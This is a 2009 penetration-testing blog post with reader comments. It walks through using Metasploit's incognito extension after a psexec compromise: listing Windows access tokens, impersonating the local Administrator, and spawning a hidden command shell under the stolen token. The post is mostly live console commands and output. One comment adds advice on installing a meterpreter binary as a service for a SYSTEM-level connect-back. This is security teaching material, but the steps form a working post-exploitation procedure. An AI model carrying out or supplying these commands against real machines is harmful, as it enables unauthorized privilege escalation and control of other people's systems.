Friday, April 10, 2009

More on working with Incognito and Metasploit

Since a buddy asked for some clarification on using incognito extension with Metasploit/Meterpreter I'll post some more notes on it.

the background you need is here:
http://www.mwrinfosecurity.com/publications/
mwri_security-implications-of-windows-access-tokens_2008-04-14.pdf

Let's set up the scenario.

We either exploited something...yea! or we guessed an admin password and used the psexec module (that's what I did). the psexec module will drop us to a SYSTEM shell if all went well.


msf exploit(psexec) > sessions

Active sessions
===============

Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.1.102:52595 -> 192.168.1.103:31851

msf exploit(psexec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: ORACLE-ENT
OS : Windows .NET Server (Build 3790, Service Pack 2).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > use incognito
Loading extension incognito...success.

now we want to query what tokens are available

Incognito Commands
==================

Command Description
------- -----------
add_group_user Attempt to add a user to a global group with all tokens
add_localgroup_user Attempt to add a user to a local group with all tokens
add_user Attempt to add a user with all tokens
impersonate_token Impersonate specified token
list_tokens List tokens available under current user context
snarf_hashes Snarf challenge/response hashes for every token

meterpreter > list_tokens
Usage: list_tokens

Lists all accessible tokens and their privilege level

OPTIONS:

-g List tokens by unique groupname
-u List tokens by unique username

meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
ORACLE-ENT\Administrator

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

We want to become the ORACLE-ENT\Administrator user

meterpreter > impersonate_token
Usage: impersonate_token

Instructs the meterpreter thread to impersonate the specified token. All other actions
will then be made in the context of that token.

Hint: Double backslash DOMAIN\\name (meterpreter quirk)
Hint: Enclose with quotation marks if name contains a space

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > impersonate_token ORACLE-ENT\\Administrator
[+] Delegation token available
[+] Successfully impersonated user ORACLE-ENT\Administrator
meterpreter > getuid
Server username: ORACLE-ENT\Administrator

Weeeeeeeeee!

Ok, should you need to get back to system, just do a rev2self

meterpreter > rev2self
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > impersonate_token ORACLE-ENT\\Administrator
[+] Delegation token available
[+] Successfully impersonated user ORACLE-ENT\Administrator
meterpreter > getuid
Server username: ORACLE-ENT\Administrator

Now you'll probably want to run commands as that user...I hope that was the point of all this...

After you load the incognito extension you'll get an extra option with your execute options (-t)

meterpreter > execute
Usage: execute -f file [options]

Executes a command on the remote machine.

OPTIONS:

-H Create the process hidden from view.
-a The arguments to pass to the command.
-c Channelized I/O (required for interaction).
-d The 'dummy' executable to launch when using -m.
-f The executable command to run.
-h Help menu.
-i Interact with the process after creating it.
-m Execute from memory.
-t Execute process with currently impersonated thread token

We need to use the "-t" so we can use the impersonated thread token, otherwise you'll get a shell as SYSTEM or whoever you were.

meterpreter > execute -f cmd.exe -H -c -i -t
Process 2936 created.
Channel 6 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\>whoami
whoami
oracle-ent\administrator

C:\>

5 comments:

Netlacky said...

Completely awesome! Thanks for the post, and the MWR Infosecurity paper reference.

Anonymous said...

Chris.. once again, you rock.

Anonymous said...

Is the "find_token REMOTEHOST" command going to be implemented in this incognito extension for meterpreter?

Thanks for the post, the MWR Infosecurity paper wag a really good read.

sid said...

Hey CG,
Nice post, is there any easy way to become system from administrator and then use incognito. The impersonation has failed for me if I get a meterpreter shell as Admin user (e.g. by using msfpayload) and not as system by exploiting stuff.

I have tried becoming admin to system first and that worked, but then becoming system to some other user, again failed.

Any comments?

CG said...

i'd set up meterpreter binary as a service or using at/sc. your connect back should be as system and the token tools should work for you.